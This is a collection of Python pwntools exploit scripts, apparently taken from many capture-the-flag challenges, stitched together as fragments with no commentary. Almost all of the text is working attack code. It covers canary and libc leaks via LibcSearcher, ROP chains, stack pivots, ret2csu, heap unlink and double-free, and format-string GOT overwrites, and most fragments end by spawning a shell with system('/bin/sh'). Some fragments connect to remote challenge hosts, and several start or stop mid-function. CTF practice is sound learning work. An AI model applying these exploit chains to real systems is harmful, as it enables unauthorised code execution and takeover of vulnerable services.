def heap_exploit(): global s elf = ELF('./babyfirewall') rel_plt = elf.get_section_by_name('.rel.plt').header.sh_addr plt0 = elf.get_section_by_name('.plt').header.sh_addr read_plt = elf.plt['read'] atoi_got = elf.got['atoi'] LIST_addr = 0x804b080 welcome('natsu') read = show((((read_plt - plt0)/16-1)*8 + rel_plt - LIST_addr)/4) #read function's addr read = u32(read[:4]) libc = LibcSearcher('read', read) base = read - libc.dump('read') system = base + libc.dump('system') log.success("base's address: " + hex(base)) log.success("system's address: " + hex(system)) add(0, 16, 'abcd') delete(0) delete(0) add(0, 16, p32(atoi_got)) add(0, 16, 'abcd') add(0, 16, p32(system)) s.recvuntil('Your choice: ') s.send('/bin/sh\x00') s.interactive()
def exp(): # leak canary payload = b"A"*0x88 + b"B" store(payload) menu(2) io.recvuntil("B") canary = u64(io.recv(7).rjust(8, b"\x00")) log.debug("canary: 0x%x" % canary) # leak libc payload = b"A"*0x88 + p64(canary) + p64(0xdeadbeef) + p64(0x400a93) + p64(elf.got["puts"]) + \ p64(elf.plt["puts"]) + p64(0x400908) store(payload) menu(3) puts_addr = u64(io.recv(6).ljust(8, b"\x00")) libc = LibcSearcher("puts", puts_addr) libc_base = puts_addr - libc.dump("puts") # onegadget 0x45216 onegadget_addr = libc_base + 0x45216 payload = b"A"*0x88 + p64(canary) + p64(0xdeadbeef) + p64(onegadget_addr) store(payload) menu(3) io.interactive()
def exp(io): elf = ELF(localfile) puts_got = elf.got["puts"] puts_plt = elf.plt["puts"] main = elf.symbols["main"] io.recvuntil("RCTF\n") payload1 = b"A" * 0x18 + p64(0x40089c) + p64(0x4008a3) + p64(puts_got) + p64(puts_plt) + p64(main) io.send(payload1) io.recvuntil("\x9c\x08\x40") puts_addr = u64(io.recv(6).ljust(8, b'\x00')) log.debug("puts addr: 0x%8x" % puts_addr) libc = LibcSearcher("puts", puts_addr) libc_base = puts_addr - libc.dump("puts") log.debug("libc base: 0x%8x" % libc_base) system_addr = libc_base + libc.dump("system") str_bin_sh = libc_base + libc.dump("str_bin_sh") payload2 = b"A" * 0x18 + p64(0x40089c) + p64(0x4008a3) + p64(str_bin_sh) + p64(system_addr) # io.recvuntil("RCTF\n") # gdb.attach(io, "b *0x4007cc") io.send(payload2) io.interactive()
def exp(): puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] gadget1 = 0x08048dab # pop ebp ; ret gadget2 = 0x08048da8 # pop ebx ; pop esi ; pop edi ; pop ebp ; ret gadget3 = 0x08048495 # pop ebx ; ret gadget4 = 0x08048daa # pop edi ; pop ebp ; ret gadget5 = 0x08048da9 # pop esi ; pop edi ; pop ebp ; ret leave_ret = 0x080485f8 #leave; ret stdin_bss = 0x0804B060 buf_bss = 0x0804B500 readn = 0x80486d9 rop_1 = 'a' * 0xd + p32(puts_plt) + p32(gadget3) + p32( puts_got) #puts(&puts) rop_1 += p32(readn) + p32(gadget4) + p32(buf_bss) + p32( 0x100) #readn(buf_bss. 0x100), ebp=buf_bss rop_1 += p32(gadget1) + p32(buf_bss) + p32(leave_ret) + p32( buf_bss) #privotstack to buf_bss add(rop_1) add('b' * 255) add('c' * 255) add('d' * 255) add('e' * 255) #gdb.attach(p, 'b* 0x08048CFA') post(4, -15) #setbuf(fd, content4) post(1, 0) #nofilter(content1, size, fd) post(0, 0) quit() p.recvuntil('service :)\n') puts_addr = u32(p.recv(4)) """ libc_base = puts_addr - libc.symbols['puts'] system_addr = libc_base + libc.symbols['system'] binsh = libc_base + next(libc.search('/bin/sh\x00')) """ libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') print "system ==> " + hex(system_addr) payload = p32(system_addr) * 2 + p32(0xdeadbeef) + p32(binsh) p.sendline(payload) p.interactive() p.close()
def search_libc(size, leak_addr): lib = LibcSearcher('puts', leak_addr) libc_base = leak_addr - lib.dump('puts') system_addr = libc_base + lib.dump('system') binsh_addr = libc_base + lib.dump('str_bin_sh') print 'Libc Base: ', hex(libc_base) print 'system() : ', hex(system_addr) print '/bin/sh : ', hex(binsh_addr) return system_addr, binsh_addr
def exploit(): bss = 0x0804A040 + 0x500 fake_ebp = bss puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] read_ebp_28 = 0x080485Da leave_ret = 0x080485FD system = 0x08048559 payload = 'a' * 0x28 payload += p32(fake_ebp) p.sendafter('name?\n', payload) p.recvuntil(p32(0x0804862A)) dbg() #if no libc one_gadget #payload += p32(libc.address + 0x3cbf7) #else #stack povit #will read(0, fake_ebp-0x28, large_number) payload += p32(read_ebp_28) p.send(payload) #gdb.attach(p, 'b* 0x080485FD') #leak libc dbg() payload = 'a' * 0x28 + p32(fake_ebp) + p32(puts_plt) + p32( read_ebp_28) + p32(puts_got) p.send(payload) p.recvline() p.recvline() p.recvline() puts_addr = u32(p.recv(4)) print "puts_addr ==> " + hex(puts_addr) libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') binsh = libc.dump('str_bin_sh') + libc_base system = libc.dump('system') + libc_base #get shell dbg() #payload = 'a'*0x28 + p32(fake_ebp) + p32(system) + p32(read_ebp_28) + p32(binsh) payload = 'a' * 0x8 p.send(payload) p.interactive() p.close()
def servers(): elf = ELF('./level1',checksec=False) payload = 'A'*(0x88+4) payload += flat([ elf.plt['write'], elf.sym['main'], 1, elf.got['write'], 8 ]) p.send(payload) write_addr = u32(p.recv(4)) log.success('write_addr = %#x',write_addr) libc = LibcSearcher('write',write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') log.info('system_addr = %#x, binsh = %#x'%(system_addr,binsh)) payload = 'A'*(0x88+4) payload += flat([system_addr, elf.sym['main'], binsh]) p.send(payload) sleep(1) p.interactive()
def exp(): # payload = b"A"*0x70 + p32(elf.plt["setbuf"]) + p32(0x80484be) + p32(0x804A040) + p32(0) # io.sendlineafter("Welcome to XDCTF2015~!\n", payload) payload = b"A" * 0x70 + p32( elf.plt["write"]) + p32(0x80484be) + p32(1) + p32( elf.got["write"]) + p32(4) io.sendlineafter("Welcome to XDCTF2015~!\n", payload) write_addr = u32(io.recv(4)) log.info("write addr: 0x%x" % write_addr) libc = LibcSearcher("write", write_addr) libc_base = write_addr - libc.dump("write") system_addr = libc.dump("system") + libc_base binsh_addr = libc.dump("str_bin_sh") + libc_base payload = b"A" * 0x70 + p32(system_addr) + p32(0xdeadbeef) + p32( binsh_addr) io.sendlineafter("Welcome to XDCTF2015~!\n", payload) io.interactive()
def roplist(p): elf = ELF('./ciscn_2019_n_5', checksec=False) puts_plt = elf.sym['puts'] read_got = elf.got['read'] main = elf.sym['main'] pop_rdi = 0x0000000000400713 # pop rdi ; ret ret = 0x00000000004004c9 # ret binsh_bss = 0x601080 p.recvuntil("tell me your name\n") p.send('123') p.recvuntil("What do you want to say to me?\n") payload = 'A' * (0x20 + 8) payload += flat([ret, pop_rdi, read_got, puts_plt, main]) p.sendline(payload) read_addr = u64(p.recv(7).ljust(8, '\x00')) log.success('read_addr = %#x', read_addr) libc = LibcSearcher('read', read_addr) libc_base = read_addr - libc.dump('read') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') log.info('system_addr = %#x, binsh = %#x' % (system_addr, binsh)) p.recvuntil("tell me your name\n") p.send('/bin/sh\x00') p.recvuntil("What do you want to say to me?\n") payload = 'A' * (0x20 + 8) # payload += flat([ret, pop_rdi, binsh, system_addr, main]) payload += flat([ret, pop_rdi, binsh_bss, system_addr, main]) p.send(payload) sleep(1) p.interactive()
def exploit(): # dbg() write_got = elf.got['write'] write_plt = elf.plt['write'] print "write_got ==> " + hex(write_got) print "write_plt ==> " + hex(write_plt) bss = 0x0804A300 main = 0x0804849B leave_ret = 0x08048511 shell = 'a' * 0x18 + p32(bss - 0x4) + p32(leave_ret) payload = p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4) p.sendafter('name?', payload) p.sendafter('say?', shell) write_addr = u32(p.recv(4)) ''' libc.address = write_addr - libc.symbols['write'] print "libc ==> " + hex(libc.address) system = libc.symbols['system'] binsh = next(libc.search("/bin/sh")) ''' libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') print "libc_base ==> " + hex(libc_base) system = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') shell = 'b' * 0x14 + p32(bss + 0x20) + p32(bss - 0x4) payload = 'c' * 0x8 + p32(system) + p32(main) + p32(binsh) p.sendafter('name?', payload) p.sendafter('say?', shell) p.interactive() p.close()
def get_libc(function, address): global one_gadget_addr, system_addr, bin_sh_addr, libc_start_main_ret_addr, libc_base # Use Write Or Puts Or Printf Func Print Symbols addr # Call get_libc Func try: libcsearch = LibcSearcher(function, address) libc_base = address - libcsearch.dump(function) bin_sh_addr = libc_base + libcsearch.dump("str_bin_sh") system_addr = libc_base + libcsearch.dump("system") one_gadget_addr = libc_base + 0x10a38c libc_start_main_ret_addr = libc_base + libcsearch.dump( "__libc_start_main_ret") info("Found Libc base : " + hex(libc_base)) info("Found Str BinSh : " + hex(bin_sh_addr)) info("Found System : " + hex(system_addr)) info("Found One_gadget : " + hex(one_gadget_addr)) info("Found Libc_start_main_ret : " + hex(libc_start_main_ret_addr)) except: null = ""
libc = ELF('./leakless') #def leak(addr): # pay = 'a'*0x48 + 'bbbb' + p32(libc.symbols['puts'])+p32(libc.symbols['main']) +p32(addr) # sh.send(pay) # data= sh.recv(4) # return data # #d = DynELF(leak,elf = ELF('./leakless')) #sys_add = d.lookup('system','libc') pay = 'a' * 0x48 + 'bbbb' + p32(libc.symbols['puts']) + p32( libc.symbols['feedme']) + p32(libc.got['puts']) sh.sendline(pay) puts_got_addr = u32(sh.recv(4)) print "puts_got_addr: " + hex(puts_got_addr) obj = LibcSearcher("puts", puts_got_addr) system_addr = puts_got_addr - obj.dump('puts') + obj.dump("system") binsh_addr = puts_got_addr - obj.dump('puts') + obj.dump("str_bin_sh") success("system_addr: " + hex(system_addr)) success("binsh_addr: " + hex(binsh_addr)) pay = 'a' * 0x48 + 'bbbb' + p32(system_addr) + p32( libc.symbols['main']) + p32(binsh_addr) #gdb.attach(sh) sh.sendline(pay) sh.interactive()
#stop_gadget = find_stop_gadget(size) stop_gadget = 0x4005c0 #brop_gadget = find_brop_gadget(size, stop_gadget) brop_gadget = 0x4007ba log.success('BROP Gadget : ' + hex(brop_gadget)) rdi_gadget = brop_gadget + 9 log.success('RDI Gadget : ' + hex(rdi_gadget)) #puts_plt = find_puts_addr(size,stop_gadget,rdi_gadget) puts_plt = 0x400555 log.success('Puts plt : ' + hex(puts_plt)) #memory_dump(size,stop_gadget,rdi_gadget,puts_plt) puts_got = 0x601018 r = remote(ip, port, level='error') addr_puts_libc = leak_libc(r, size, stop_gadget, rdi_gadget, puts_plt, puts_got) log.info('Address of puts in libc : ' + hex(addr_puts_libc)) lib = LibcSearcher('puts', addr_puts_libc) libcBase = addr_puts_libc - lib.dump('puts') system_addr = libcBase + lib.dump('system') binsh_addr = libcBase + lib.dump('str_bin_sh') log.info('libc base : ' + hex(libcBase)) log.info('system : ' + hex(system_addr)) log.info('binsh : ' + hex(binsh_addr))
from pwn import * from LibcSearcher import * io = remote('node3.buuoj.cn', 28557) elf = ELF('bjdctf_2020_babyrop') context.log_level = 'debug' main_addr = 0x4006AD puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] pop_rdi = 0x400733 payload = 'a' * 40 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64( main_addr) io.recvuntil('Pull up your sword and tell me u story!\n') io.sendline(payload) message = u64(io.recv(6).ljust(8, '\x00')) print(message) libc = LibcSearcher('puts', message) base = message - libc.dump('puts') system = base + libc.dump('system') str_sh = base + libc.dump('str_bin_sh') io.recvuntil('Pull up your sword and tell me u story!\n') payload = 'a' * 40 + p64(pop_rdi) + p64(str_sh) + p64(system) io.sendline(payload) io.interactive()
new(0x80, '/bin/sh\x00') edit(3, 'a') payload = p64(0) + p64(0x20) + p64(0x6020e0 - 0x18) + p64(0x6020e0 - 0x10) + p64(0x20) payload = payload.ljust(0x80, 'a') payload += p64(0x80) + p64(0x90) edit(-0x8000000000000000, payload) #gdb.attach(io,'b *0x400BB9') #raw_input() delete(4) free_got = elf.got['free'] printf_plt = elf.plt['printf'] puts_plt = elf.plt['puts'] #gdb.attach(io,'b *0x400CB8') #raw_input() write(free_got, p64(printf_plt)[:-1]) write(0x6020e8, '%11$p\x00') #gdb.attach(io,'b *0x400BB9') #raw_input() libc_start_main = int(show(), 16) - 240 obj = LibcSearcher('__libc_start_main', libc_start_main) libc_base = libc_start_main - obj.dump('__libc_start_main') system = obj.dump('system') + libc_base log.success('system: ' + hex(system)) write(free_got, p64(system)[:-1]) #gdb.attach(io,'b *0x400BB9') #raw_input() delete(6) io.interactive()
puts_got = elf.got["puts"] print("puts_plt:" + str(puts_plt)) print("puts_got:" + str(puts_got)) main_addr = 0x4006b8 popret = 0x400763 # payload1 = "a" * 72 + p64(puts_plt) + p64(main_addr) + p64(puts_got) payload1 = "a" * 72 + p64(popret) + p64(puts_got) + p64(puts_plt) + p64(main_addr) payload1 += 'a' * (200 - len(payload1)) io.sendline(payload1) io.recvuntil("bye~\n") # puts_addr = int(io.recv(6), 16) puts_addr = u64(io.recv(6).ljust(8, '\x00')) print("puts_addr:" + str(hex(puts_addr))) libc = LibcSearcher("puts", puts_addr) libcbase = puts_addr - libc.dump("puts") system_addr = libcbase + libc.dump("system") binsh_addr = libcbase + libc.dump("str_bin_sh") payload2 = 'a' * 71 + p64(popret) + p64(binsh_addr) + p64(system_addr) # extra \x0a before payload2 += 'a' * (200 - len(payload2)) # gdb.attach(io) print("popret:" + hex(popret)) print("system_addr:" + hex(system_addr)) io.sendline(payload2) io.interactive()
write_address = exe.got['write'] main_address = exe.symbols['main'] reg_values = [0, 0, write_address, 1, write_address, 8] padding_over1 = ['A'] * 56 padding_over = ['A'] * 136 f**k = csu(reg_values, padding_over, padding_over1, main_address) io = start() io.recvuntil('Hello, World\n') io.sendline(f**k) sleep(1) write_address = u64(io.recv(8)) libc = LibcSearcher('write', write_address) libc_base = write_address - libc.dump('write') # get real system address system_addr = libc_base + libc.dump('system') read_addr = libc_base + libc.dump('read') bss_base = exe.bss() # make /bin/bash string read(0, bss_base, 16) reg_values = [0, 0, read_addr, 0, bss_base, 16] padding_over = ['A'] * 136 padding_over1 = ['A'] * 56 f**k = csu(reg_values, padding_over, padding_over1, main_address) io.sendline(f**k) io.send(p64(system_addr) + '/bin/sh\x00')
payload += p64(last) sh.send(payload) sleep(1) gdb.attach(sh) sh.recvuntil('Hello, World\n') ## RDI, RSI, RDX, RCX, R8, R9, more on the stack ## write(1,write_got,8) csu(0, 1, write_got, 1, write_got, 8, main_addr) # sh.recvuntil('Hello, World\n') write_addr = u64(sh.recv(8)) print "write_addr, ", hex(write_addr), write_addr libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') execve_addr = libc_base + libc.dump('execve') log.success('execve_addr ' + hex(execve_addr)) ####--- orignal test. ## read(0,bss_base,16) ## read execve_addr and /bin/sh\x00 sh.recvuntil('Hello, World\n') csu(0, 1, read_got, 0, bss_base, 16, main_addr) sh.send(p64(execve_addr) + '/bin/sh\x00') sh.recvuntil('Hello, World\n') ## execve(bss_base+8) csu(0, 1, bss_base, bss_base + 8, 0, 0, main_addr)
# p = process('./babyrop') p = remote('node3.buuoj.cn', 27480) elf = ELF('./babyrop', checksec=False) puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main = elf.sym['main'] pop_rdi = 0x0000000000400733 # pop rdi ; ret payload = 'A' * (0x20 + 8) payload += flat([pop_rdi, puts_got, puts_plt, main]) p.recvuntil("Pull up your sword and tell me u story!\n") p.send(payload) puts_addr = u64(p.recvuntil('\n', drop=True).ljust(8, '\x00')) log.success('puts_addr = %#x', puts_addr) libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') log.info('system_addr = %#x, binsh = %#x' % (system_addr, binsh)) payload = 'A' * (0x20 + 8) payload += flat([pop_rdi, binsh, system_addr, main]) p.recvuntil('story!\n') p.send(payload) sleep(1) p.interactive()
return def edit(idx,content): return def show(idx): return relloc_offset = [0,2,4,6,0xb,0xc,0x10] #payload='\x00'*0x33+p64(0x00000000fbad1800)+p64(0)*3+'\x00' #stdout-0x33 payload = p32(0x08048e48) * (0x64 / 4) set_name(payload) menu(1) #debug() payload = "-10\x00" + p32(0) + p32(elf.plt["puts"]) +p32(0x804A605)+ p32(elf.got["puts"]) a.sendlineafter("> ",payload) puts_addr = u32(a.recv(4)) libc =LibcSearcher("puts",puts_addr) libc_base = puts_addr - libc.dump("puts") f**k(libc_base) payload = "/bin/sh\x00" + p32(0x08048e48) * (0x5c / 4) set_name(payload) menu(1) #debug() pop_3_ret = 0x080494da payload = "-10\x00" + p32(0) + p32(libc_base + libc.dump("system")) +p32(0)+ p32(0x80580D0) #payload = "-10\x00" + p32(0) + p32(elf.plt["open"]) + p32(pop_3_ret) + p32(0x80580D0) + p32(0) + p32(0) #payload += p32(elf.plt["read"]) + p32(pop_3_ret) + p32(3) + p32(elf.bss() + 0x800) + p32(0x30) #payload += p32(elf.plt["write"]) + p32(pop_3_ret) + p32(1) + p32(elf.bss()+ 0x800) + p32(0x30) a.sendlineafter("> ",payload) a.interactive()
###leak canary### payload = 'ab%7$p' sla("I'll give u some gift to help u!", payload) ru("ab") canary = int(rv(18), 16) success(hex(canary)) ###leak libc### offset = 0x20 payload = 'A' * (offset - 0x8) + p64(canary) + 'deadbeef' payload += p64(pop_rdi_ret) + p64(puts_got) payload += p64(puts_plt) + p64(vuln) sla("Pull up your sword and tell me u story!", payload) puts = u64(ru("\x7f")[-6:].ljust(8, '\x00')) libc = LibcSearcher("puts", puts) libc_base = puts - libc.dump('puts') system = libc_base + libc.dump("system") sh = libc_base + libc.dump("str_bin_sh") ###ROP### sla("I'll give u some gift to help u!", "hack it") payload = 'A' * (offset - 0x8) + p64(canary) + 'deadbeef' payload += p64(pop_rdi_ret) + p64(sh) payload += p64(system) + p64(vuln) sla("Pull up your sword and tell me u story!", payload) ###get shell### ia()
from pwn import * from LibcSearcher import * ru = lambda x:p.recvuntil(x) sl = lambda x:p.sendline(x) context.log_level='debug' #p = process('./1') p = remote('220.249.52.133','59451') elf = ELF('./1') write_got = elf.got['write'] puts_plt = elf.plt['puts'] pop_24 = 0x40089C pop_rdi = 0x4008A3 main_addr = 0x4007CD ru('Welcome to RCTF\n') payload = 'a'*0x18 + p64(pop_24) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr) sl(payload) ru('\x40') write_addr = u64(p.recv(6).ljust(8,'\x00')) libc = LibcSearcher('write',write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh_addr = libc_base + libc.dump('str_bin_sh') ru('\n') payload = 'a'*0x18 + p64(pop_24) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr) sl(payload) p.interactive()
p.recvuntil('Enter the content: \n') p.sendline(content) ###leak libc### payload = '%11$p%15$p' p.recvuntil('Enter your name: ') p.sendline(payload) p.recvuntil('Hello, ') base = int(p.recv(14), 16) - 0x1186 libc_start_main = int(p.recv(14), 16) - 240 success(hex(base)) success(hex(libc_start_main)) libc = LibcSearcher('__libc_start_main', libc_start_main) libc_base = libc_start_main - libc.dump('__libc_start_main') system = libc_base + libc.dump('system') ###unlink### heap_array = base + 0x202060 free_hook = libc_base + libc.dump('__free_hook') chunk = heap_array + 0x10 fake_FD = chunk - 0x18 fake_BK = chunk - 0x10 add(0, 0x98, 'aaaa') add(1, 0x98, 'bbbb') add(2, 0x98, 'cccc') add(3, 0x90, 'dddd') add(4, 0x90, '/bin/sh\x00')
def printcontact(): sh.recvuntil('>>> ') sh.sendline('4') sh.recvuntil('Contacts:') sh.recvuntil('Description: ') # get system addr & binsh_addr payload = '%31$paaaa' createcontact('1111', '1111', '111', payload) printcontact() libc_start_main_ret = int(sh.recvuntil('aaaa', drop=True), 16) log.success('get libc_start_main_ret addr: ' + hex(libc_start_main_ret)) libc = LibcSearcher('__libc_start_main_ret', libc_start_main_ret) libc_base = libc_start_main_ret - libc.dump('__libc_start_main_ret') system_addr = libc_base + libc.dump('system') binsh_addr = libc_base + libc.dump('str_bin_sh') log.success('get system addr: ' + hex(system_addr)) log.success('get binsh addr: ' + hex(binsh_addr)) #gdb.attach(sh) # get heap addr and ebp addr payload = flat([ system_addr, 'bbbb', binsh_addr, '%6$p%11$pcccc', ]) createcontact('2222', '2222', '222', payload)
#这里用到了printf("You said: %s\n", &nptr)语句的%s的地址,所以后面调用printf函数时的参数是‘you said 。。。。’,所以后面接受时要接收2次said之后的结果。 frame_adr = 0x80486f8 printf_plt = elf.plt['printf'] printf_got = elf.got['printf'] main = 0x80485b8 io.recvuntil('to read?') payload = '-1' io.sendline(payload) payload = cyclic(0x2c + 4) + p32(printf_plt) + p32(main) + p32( frame_adr) + p32(printf_got) io.recvuntil('of data!\n') io.sendline(payload) #函数结束前的输出字符串 io.recvuntil('said: ') #rop执行后输出的字符串,其中有函数地址 io.recvuntil('said: ') printf_adr = u32(io.recv(4)) libc = LibcSearcher('printf', printf_adr) print(printf_adr) base = printf_adr - libc.dump('printf') system = base + libc.dump('system') binsh = base + libc.dump('str_bin_sh') payload = '-1' io.recvuntil('to read?') io.sendline(payload) payload = cyclic(0x2c + 4) + p32(system) + p32(main) + p32(binsh) io.recvuntil('data!\n') io.sendline(payload) io.interactive()
p = process('./chall') else: p = remote('challs.xmas.htsp.ro', 12006) elf = ELF('./chall', checksec=False) plt_puts = elf.plt['puts'] got_puts = elf.got['puts'] addr_rdi = 0x401273 addr_main = 0x401167 pd = 'a' * 0x12 pd += p64(addr_rdi) pd += p64(got_puts) pd += p64(plt_puts) pd += p64(addr_main) p.sendlineafter('Helloooooo, do you like to build snowmen?\n', pd) p.recvuntil('Mhmmm... Boring...\n') addr_puts = u64(p.recv(6).ljust(8, '\x00')) libc = LibcSearcher('puts', addr_puts) # 1: http://ftp.osuosl.org/pub/ubuntu/pool/main/g/glibc/libc6_2.27-3ubuntu1_amd64.deb (id libc6_2.27-3ubuntu1_amd64) libc_one_gadget = [0x4f2c5, 0x4f322, 0x10a38c] libcbase = addr_puts - libc.dump('puts') addr_one_daget = libcbase + libc_one_gadget[0] pd = 'a' * 0x12 pd += p64(addr_one_daget) p.sendlineafter('Helloooooo, do you like to build snowmen?\n', pd) p.recvuntil('Mhmmm... Boring...\n') success('addr_puts = ' + hex(addr_puts)) p.interactive()
sleep(1) r = remote(host, port) r.recvuntil(header) # now that we have the binary, the rest is just normal rop p = log.progress('Leaking GOT entry of puts', level=logging.CRITICAL) context.log_level = 'critical' # suspend all logging puts_got = 0x601018 puts_libc = u64(same_session_leak(r, offset, puts_got, pop_rdi_ret, puts)[:8]) # alternatively, use dynelf to resolve them, but somehow doesnt work... # dynelf_leak = lambda addr: same_session_leak(r, offset, addr, pop_rdi_ret, puts)[:8] # d = DynELF(dynelf_leak, pointer=puts) # puts_libc = d.lookup('puts', 'libc') context.log_level = 'info' # resume all logging p.success('Leaked puts@libc: 0x%x' % puts_libc) libc = LibcSearcher('puts', puts_libc) libc_base = puts_libc - libc.dump('puts') binsh = libc_base + libc.dump('str_bin_sh') system = libc_base + libc.dump('system') # call system log.info('Calling system(\'/bin/sh\')') payload = call_function(offset, system, binsh, pop_rdi_ret, stop_gadget) r.sendline(payload) r.interactive()
elf = ELF('/home/nop/Desktop/babystack') puts_plt = elf.symbols['puts'] read_got = elf.got['read'] log.info('puts_plt = %#x, read_got = %#x'%(puts_plt,read_got)) payload1 = 'A'*0x88 + p64(canary) + 'B'*8 payload1 += p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(0x400720) p.send(payload1) sleep(3) p.recvuntil("\n>> ") # read the trash data p.send('3') # choice 3 option to make the stack crash sleep(1) read_addr = u64(p.recv()[:6].ljust(8,'\x00')) log.info('read_addr = %#x',read_addr) libc = LibcSearcher('read',read_addr) libc_base = read_addr - libc.dump('read') system_addr = libc_base + libc.dump('system') binsh_addr = libc_base + libc.dump('str_bin_sh') log.info("system_addr = %#x, binsh_addr = %#x"%(system_addr,binsh_addr)) sleep(1) p.send('1') # choice 1 option to couse stack overflow payload2 = 'A'*0x88 + p64(canary) + 'B'*8 payload2 += p64(pop_rdi) + p64(binsh_addr) + p64(system_addr) + p64(0x400720) p.send(payload2) sleep(0.1) p.send('3') # choice 3 option to make the stack crash sleep(1)
text_segment += '\x00' finally: f = open('blind_pwn', 'wb') f.write(text_segment) ###leak program### start = 0x8048000 stop = 0x8048b00 #dump2file(start,stop) ###leak libc### read_got = 0x804A010 read = u32(dump4text(read_got)[:4]) libc = LibcSearcher('read', read) libc_base = read - libc.dump('read') system = libc_base + libc.dump('system') success(hex(libc_base)) ###hijack GOT### printf_got = 0x804A014 payload = fmtstr_payload(8, {printf_got: system}, numbwritten=10) sl(payload) sl(';/bin/sh\x00') ###get shell### ia()
from LibcSearcher import * p = process('./GUESS') elf = ELF('./GUESS') offset = 0x128 puts_got = elf.got['puts'] ###leak libc### payload = 'A' * offset + p64(puts_got) p.recvuntil('Please type your guessing flag\n') p.sendline(payload) p.recvuntil('*** stack smashing detected ***:') puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') log.success('libc base:' + hex(libc_base)) ###leak stack### environ = libc_base + libc.dump('_environ') log.success('_environ:' + hex(environ)) payload = 'A' * offset + p64(environ) p.recvuntil('Please type your guessing flag\n') p.sendline(payload) stack = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) log.success('stack:' + hex(stack)) ###leak flag###